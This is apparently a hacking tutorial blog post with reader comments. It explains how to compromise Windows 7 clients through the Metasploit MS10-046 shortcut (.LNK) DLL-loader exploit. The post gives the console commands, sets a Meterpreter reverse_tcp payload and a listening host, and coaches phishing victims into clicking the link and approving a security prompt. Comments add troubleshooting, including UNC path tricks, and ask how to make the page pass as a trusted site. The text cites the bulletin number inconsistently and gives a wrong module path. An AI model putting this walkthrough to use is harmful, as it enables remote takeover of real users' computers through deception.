After the disaster that was Windows Vista and the limited and reluctant adoption of Windows 8 and 8.1, Windows 7 has become the de facto standard operating system on the desktop/client.

Although the most valuable information to the hacker resides on servers, sometimes the best way to get to a fortified server is through a vulnerable client on the same network with inexperienced and gullible users and numerous insecure applications.

Microsoft finally got the message that they need to make their operating systems more secure and they have done so. Attacking their operating systems has become increasingly difficult. Fortunately, for the hacker, the same cannot be said for their browser, Office Suite, and other apps, as well as all of the third-party applications that reside on the typical client system and, sometimes—on the server.

We will focus on attacking those vulnerabilities in the browser and the apps on Windows 7 in order to gain access and own those systems in the following "How to Hack Windows 7" series of tutorials. In this installment, we'll be sending a malicious link thanks to a vulnerability in the handling of Windows Shortcut files.

Step 1: Open Metasploit

Let's start by opening Metasploit. You can do that by using the menu system in BackTrack, or more simply, typing:

bt > msfconsole

You will be greeted by a screen like this.

Step 2: Load the Exploit

In this Windows 7 hack, we will be using an exploit that Microsoft numbers as MS10-045 in their Microsoft Security Bulletins and takes advantage of a buffer overflow in the shortcut dll. Let's load it by typing:

msf > use windows/ms10_046_shortcut_icon_dllloader

Step 3: Get the Info

Now that we have it loaded in the Metasploit framework, let's get more info on this exploit to better understand what we will be doing.

msf > info

As we can read at the bottom, the developer of the exploit writes:

"This module exploits a vulnerability in the handling of Windows Shortcut file (.LNK) that contain an icon resource pointing to a malicious DLL."

Essentially, we will be creating a shortcut file, that when clicked on by a gullible end user, will allow the execution of our malicious code.

Step 4: Set the Options

With the exploit loaded and the knowledge of how it works, let's set the required options. First, set the Payload. My preference is the great and powerful (sounds like Oz) Meterpreter.

set PAYLOAD windows/meterpreter/reverse_tcp

Now we need to set the IP our our system as LHOST:

set LHOST 192.168.1.111

Once we have these options set, we can simply type "exploit" to generate the exploit. Unlike some of our other remote exploits, what we've done here is generate a link and a server to host that link.

As you can see where I have highlighted in the above screenshot, Metasploit has generated the exploit and then started a server to host the exploit. Our job now is to get the victim to click on the link.

Step 5: Send the Link to the Victim

We need to be creative here. This is the social engineering part of this hack. One way or another, we need to induce the victim to click on our link.

We've all seen those spam emails that claim to help us acquire a small fortune by working at home, grow our penises to proportions that would make a stallion envious, and apply for millions of dollars in unclaimed bank funds. Or, it could simply be something as innocent-sounding as watching a hilarious cat video. If we click on any of the links, we're likely to become a victim of a hack like this one.

You might say "no one would be so gullible," but in reality, there are billions of such gullible people. Some of the greatest hacks in history (RSA and NY Times come immediately to mind) have been accomplished this way. When all is said and done, I believe that the hackers who gained access to the credit cards numbers at Target gained their foothold inside that network by getting one unwitting employee to click on a link such as this.

So...we have the link and the victim clicks on it like in the screenshot below.

Now, here is the crucial and tricky part...

The victim will be greeted by a security warning. The victim must "Allow" the code to run. Many, or probably most users will know better than to "Allow," but it only requires one user of thousands to compromise an entire network. Make the link sound compelling enough and SOMEONE will click "Allow," especially if it comes from someone they know or think they know and trust.

Step 6: Sends the Exploit and Payload

When the victim clicks on the "Allow" prompt, Metasploit begins the process of establishing a client/server connection between you and the victim. This process is fairly slow, so be patient. In my experience, even on an unpatched Windows 7 system, it does not always work, so be persistent. Persistence and creativity are key attributes of a successful hacker.

Step 7: Success!

If we have done everything correctly and the victim is vulnerable and naive, we will be greeted by the meterpreter prompt!

As our enlightened friend (ARSLAN) here has pointed out the prompt given in the text is wrong should be "use windows/browser/ms10046shortcuticondllloader" (it is noted in the screen shot though guys if you had looked....also given that its a BROWSER exploit.... Give Master OTW the credit he deserves!!)

Although in other news its worth noting that the "host/anything.lnk" seems to be the way to get this to send

i will have to commend you on your tutorials occupyt hewb. there are very understanding and straight forward. thanks. but am been face with a problem i dont understand after i i dont everything and i test it on my windows 7. in my kali i keep getting 'ms10046shortcuticondllloader - Sending UNC redirect' and it never stops. is that it is not vulnerable or what is the cuase. in the metasploit options it say 'UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).' i dont understand it. please help me.

About that "Sending UNC redirect" stuck message that a lot of us are getting with this, I've realized something: it only shows on your Terminal if you send the link with "/" instead of "\", for instance "//192.168.1.16/anything/" instead of "\\192.168.1.16\anything\". Both of them opens Windows Explorer where you can see the dll and the lnk files being created, although if you use "\" the Internet Explorer doesn't ask for your permission to open the link, which I find kind of strange... Does this hack work with both ways? I just found the differences, I'm still just a noob with Linux, Kali, Metasploit, Meterpreter and anything beyond Microsoft Windows itself.

When I did it instead of sending anything it kept saying 'redirecting' or something like that and on the hosted site there wasn't an allow/don't allow popup there was just a crap ton of reloading ads. This might have something to do with my flash player being disabled ... maybe. Also I was wondering if you could change the background of the page to look like a trusted site.